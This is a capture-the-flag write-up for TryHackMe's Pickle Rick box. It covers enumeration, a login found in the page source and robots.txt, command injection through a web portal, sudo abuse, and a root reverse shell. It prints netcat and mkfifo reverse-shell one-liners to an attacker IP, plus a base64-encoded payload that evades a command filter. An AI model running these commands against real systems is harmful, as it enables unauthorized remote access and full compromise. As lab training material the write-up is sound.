Pickle Rick is a TryHackMe CTF requiring you to exploit a web-server in order to find 3 ingredients.

[Task 1] Pickle Rick

What is the first ingredient Rick needs?

Browsing to home page

Lets start out by browsing to the IP, we’ve already been told the box is a web server, it’s probably safe to assume that there might a web site.

Browsing to the site you find an amusing Rick and Morty-based homepage telling you that you need to log in the computer to retrieve 3 ingredients.

On further inspection of the page source, you’ll find comment near the closing </body> tag:

Note to self, remember username!
Username: R1ckRul3s

Running enumeration scripts

NMAP

Nothing particularly interesting here, for now. Just further affirmation that there is a web-server, and there’s an SSH port that’s open. Which, we’ll be exploiting later on I imagine.

kali@kali:~/Desktop/TryHackMe/picklerick$ nmap -sV -sC 10.10.3.141 -oA nmap.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 09:21 EDT                                                    
Nmap scan report for target.thm (10.10.3.141)                                                                      
Host is up (0.021s latency).                                                                                       
Not shown: 998 closed ports                                                                                        
PORT   STATE SERVICE VERSION                                                                                       
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)                                  
| ssh-hostkey:                                                                                                     
|   2048 35:9f:5b:ab:b1:49:3d:27:a1:b2:5e:e6:68:31:36:f0 (RSA)                                                     
|   256 46:c6:60:c2:f9:86:73:e9:b7:b9:d9:b3:0a:ed:9b:89 (ECDSA)                                                    
|_  256 a9:4c:47:2f:0f:fb:15:65:95:22:c2:85:f6:66:a9:2d (ED25519)                                                  
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))                                                                
|_http-server-header: Apache/2.4.18 (Ubuntu)                                                                       
|_http-title: Rick is sup4r cool                                                                                   
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel                                                            
GOBUSTER

Hopefully gobuster can reveal more about the application.

kali@kali:~/Desktop/TryHackMe/picklerick$ gobuster dir – url http://target.thm – wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://target.thm
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/13 09:24:29 Starting gobuster
===============================================================
/assets (Status: 301)
/server-status (Status: 403)
===============================================================
2020/09/13 09:25:31 Finished
===============================================================

The above GoBuster run was pretty sparce, so I ran another, this time enumerating files with extensions htm,php,txt....

kali@kali:~/Desktop/TryHackMe/picklerick$ gobuster dir – url http://target.thm – wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt – threads 100 – extensions htm,php,txt,rar,zip,db,cfg,js – expanded – followredirect
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://target.thm
[+] Threads:        100
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     htm,php,txt,rar,zip,db,cfg,js
[+] Follow Redir:   true
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/09/13 09:28:52 Starting gobuster
===============================================================
http://target.thm/login.php (Status: 200)
http://target.thm/assets (Status: 200)
http://target.thm/portal.php (Status: 200)
http://target.thm/robots.txt (Status: 200)

In this case, we found 3 important points:

  • login.php
  • portal.php
  • robots.txt

Digging into enumerated information

Login.php

This a login page, with a post form that sends the following params

  • username
  • password
  • sub=Login

Portal.php

This page redirects to .login.php, likley because we’re not logged in. We may have to bruteforce the login form with hydra.

Robots.txt

A malformed robots file. It contains a singular text line: Wubbalubbadubdub.
Could this be the password for the login page?

Attempting to login with enumerated data

We’ll be testing the following credentials that we’ve pulled so far:

  • Username: R1ckRul3s
  • Password: Wubbalubbadubdub ?

And fortunately, it works!

Exploiting Portal.php

Now that we’re in the Portal, we dig around.

Command execution form

The first thing we see on portal.php is the “command execution” input box. Lets test this, to see what commands it runs. Preferrably it’ll be some server side command execution; bash, or PHP.

Lets try running ls -lah and see if we can pull a directory listing.

And we can confirm the form does execute bash script, and get the output:

total 40K
drwxr-xr-x 3 root   root   4.0K Feb 10  2019 .
drwxr-xr-x 3 root   root   4.0K Feb 10  2019 ..
-rwxr-xr-x 1 ubuntu ubuntu   17 Feb 10  2019 Sup3rS3cretPickl3Ingred.txt
drwxrwxr-x 2 ubuntu ubuntu 4.0K Feb 10  2019 assets
-rwxr-xr-x 1 ubuntu ubuntu   54 Feb 10  2019 clue.txt
-rwxr-xr-x 1 ubuntu ubuntu 1.1K Feb 10  2019 denied.php
-rwxrwxrwx 1 ubuntu ubuntu 1.1K Feb 10  2019 index.html
-rwxr-xr-x 1 ubuntu ubuntu 1.5K Feb 10  2019 login.php
-rwxr-xr-x 1 ubuntu ubuntu 2.0K Feb 10  2019 portal.php
-rwxr-xr-x 1 ubuntu ubuntu   17 Feb 10  2019 robots.txt

After further attempted exploitation, I tried to run:

cat Sup3rS3cretPickl3Ingred.txt; echo; cat clue.txt; echo; whoami; echo; ps -aux; groups

Which returns Command disabled to make it hard for future PICKLEEEE RICCCKKKK. (¬.¬) ….

Fortunately the command input is only temporarily disabled. And after a little fiddling around find that it’s the cat command that’s disabled. Though, interestingly the error message’s source does contain some type of hashed data?

Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0==

The whoami command let me know that we’re running as www-data.

The ls /home command shows there are two users with directories there: rick, ubuntu.

Trying to get a reverse netcat shell

I’d tried to figure out what the hell the above hash was, but to no avail, so lets see if we can get a reverse shell on the machine and get a more interactive interface to toy around with.

We’ll need to listen for connections on our attacker machine.

# On the attacker machine
nc -lvp 4444
# On the victim machine, run netcat, and on connect, create a shell
nc 10.11.8.219 4444 -e /bin/sh

The connection failed, which could be down to the version of netcat. So I ran man netcat via the portal input. Which returned a hint on how to bypass this:

There is no -c or -e option in this netcat, but you still can execute a
     command after connection being established by redirecting file descrip-
     tors. Be cautious here because opening a port and let anyone connected
     execute arbitrary command on your site is DANGEROUS. If you really need
     to do this, here is an example:

     On 'server' side:

           $ rm -f /tmp/f; mkfifo /tmp/f
           $ cat /tmp/f | /bin/sh -i 2>&1 | nc 10.11.8.219 4444 > /tmp/f

We can’t use the cat command for a return; but, it may still execute on the victim box, so lets test it at least.

# Run first, to create the mkfifo
rm -f /tmp/f; mkfifo /tmp/f;
# Run second, for reverse shell
cat /tmp/f | /bin/sh -i 2>&1 | nc 10.11.8.219 4444 > /tmp/f;

Unfortunately we failed once again. I’m wondering at this point whether to:

a. Create shell script shell.sh and echo the …Run second… part from above into it, then run that.
b. Create a PHP based shell, upload it to /var/www/html and just execute it.

I’ll go with option A first, then test B.

Shell attempt #1 (shell script)

To save time, I can determine if it’s actally the word cat that’s causing the remote execution to fail.

echo 'cat'; if this fails, then we can skip to option B.

And fortunately-kinda, it fails. So looks like we should try another route.

Shell attempt #2 (php script)

First we need to determine if we can wget files. If we can, we’ll set up a python3 -m http.server on our attacker machine, create a PHP shell, upload it to /var/www/html/... then execute it by browsing to the file.

But, unfortunately, wget doesn’t seem to return any response.

Shell attempt #3 (shell script hacky)

We can’t run the cat command, but, we might be able to echo ca, and then t blah blah blah into a script file that we execute. That way, we avoid inputting and explicit cat into our command.

We don’t have write access in /var/www/html.

On running sudo -l, our current user seems to have some funky permissions too. I’m unsure as to how to exploit this for the time being, but lets dive deeper and find our where we can write a shell to.

Matching Defaults entries for www-data on ip-10-10-3-141.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-3-141.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL

It really feels like we should have write access in /var/www/html, but lets try somewhere else. The classic /tmp directory is usually spankable.

touch /tmp/x.sh; ls -lah /tmp;
x.sh

Success, we can create a shell script here, now lets try our hacky cat concatenation.

# first we'll print 'ca' to the file, then the rest
printf 'ca' > /tmp/x.sh;
ls -lah /tmp/x.sh | grep x.sh; # we can see that bytes are added to the file! 
# and the rest...
printf 't /tmp/f | /bin/sh -i 2>&1 | nc -l 10.11.8.219 4444 > /tmp/f;' >> /tmp/x.sh;
ls -lah /tmp/x.sh | grep x.sh; # fingers crossed this'll run! 
# then try run the script with sudo
sudo sh /tmp/x.sh;
# if that fails try normal shell exec
sh /tmp/x.sh;

This unfortunately failed; but lets test if the shell script actually runs? It may be an error on our behalf.

touch /tmp/y.sh;
printf 'touch /tmp/works.txt; whoami | printf > /tmp/works.txt;' > /tmp/y.sh;
sudo sh /tmp/y.sh;
ls -lah /tmp/;

The script is running as root, so we’re really close. See the works.txt file.

total 40K
drwxrwxrwt  8 root     root     4.0K Sep 13 14:33 .
drwxr-xr-x 23 root     root     4.0K Sep 13 12:50 ..
drwxrwxrwt  2 root     root     4.0K Sep 13 12:50 .ICE-unix
drwxrwxrwt  2 root     root     4.0K Sep 13 12:50 .Test-unix
drwxrwxrwt  2 root     root     4.0K Sep 13 12:50 .X11-unix
drwxrwxrwt  2 root     root     4.0K Sep 13 12:50 .XIM-unix
drwxrwxrwt  2 root     root     4.0K Sep 13 12:50 .font-unix
prw-r--r –  1 www-data www-data    0 Sep 13 14:04 f
drwx---- –  3 root     root     4.0K Sep 13 12:50 systemd-private-a938bdfc8fce449a9ca1d228a57f00d8-systemd-timesyncd.service-oSRCc2
-rw-r--r –  1 root     root        0 Sep 13 14:33 works.txt
-rw-r--r –  1 www-data www-data   63 Sep 13 14:30 x.sh
-rw-r--r –  1 www-data www-data   55 Sep 13 14:33 y.sh

It seems like it’s the printf that didn’t work, as there’re no bytes in the file. Lets try echo instead.

touch /tmp/y.sh;
echo 'touch /tmp/works2.txt; whoami | echo > /tmp/works2.txt;' > /tmp/y.sh;
sudo sh /tmp/y.sh;
ls -lah /tmp/;

Hmm. As we DO have root. Let’s see if we can steal some SSH files from either rick or ubuntu.

Stealing SSH files instead..

We know we can perform route actions, we just can’t use cat or head .etc … Little bit annoying, but, we do have more options. Lets see if there are some SSH keys we can acquire.

sudo ls -lah /home/rick

And heh, we’ve found the second ingredient file at least…

Though, the aren’t any SSH files for rick.

ls -lah /ubuntu/.ssh has also been wiped. Annoyingly.

Lets get dirty, and create an encoded script

I’m going to encode the previous script with base64, then on the victim machine, decode the text into our shell script…

# on attacker machine

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.8.219 4444 >/tmp/f' | base64;

We get the following output… which isn’t quite right.

# base64 script for victim...
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAu
MTEuOC4yMTkgNDQ0NCA+L3RtcC9mCg==

Lets chunk it down so we don’t have a funky link break…

echo 'rm /tmp/f;mkfifo /tmp/f;' | base64;
echo 'cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.8.219 4444 >/tmp/f;' | base64;

kali@kali:~/Desktop/TryHackMe/picklerick$ echo 'rm /tmp/f;mkfifo /tmp/f;' | base64;
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Cg==

kali@kali:~/Desktop/TryHackMe/picklerick$ echo 'cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.8.219 4444 >/tmp/f;' | base64;
Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTEuOC4yMTkgNDQ0NCA+L3RtcC9mOwo=

And run this on victim machine

touch /tmp/a.sh;

echo 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Cg==' | base64 -d > /tmp/a.sh;
echo 'Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTEuOC4yMTkgNDQ0NCA+L3RtcC9mOwo=' | base64 -d >> /tmp/a.sh;

sudo sh /tmp/a.sh;

We then we get root on our netcat!

kali@kali:~/Desktop/TryHackMe/picklerick$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.11.8.219] from target.thm [10.10.70.157] 42390
/bin/sh: 0: can't access tty; job control turned off                                                                                                        
# whoami                                                                                                           
root                                                                                                               

Now to explore and, finally, cat the files we were looking for.

Exploiting root shell

We can now read the first ingredient that Risk needs

# cat Sup3rS3cretPickl3Ingred.txt

Whats the second ingredient Rick needs?

We stumbled on this earlier, it’s tucked away in the /home/rick directory.

# cd /home/rick
# ls
second ingredients
# cat 'second ingredients'

Whats the final ingredient Rick needs?

There’s nothing in the /home/rick directory, so lets explore further.

The /home/ubuntu directory seems empty at first, but on running ls -lah, we find there’s a .bash_history file, which, contains a reference to the last ingredient.

cat /home/ubuntu/.bash_history

That was a good box.

Author

Leave a Reply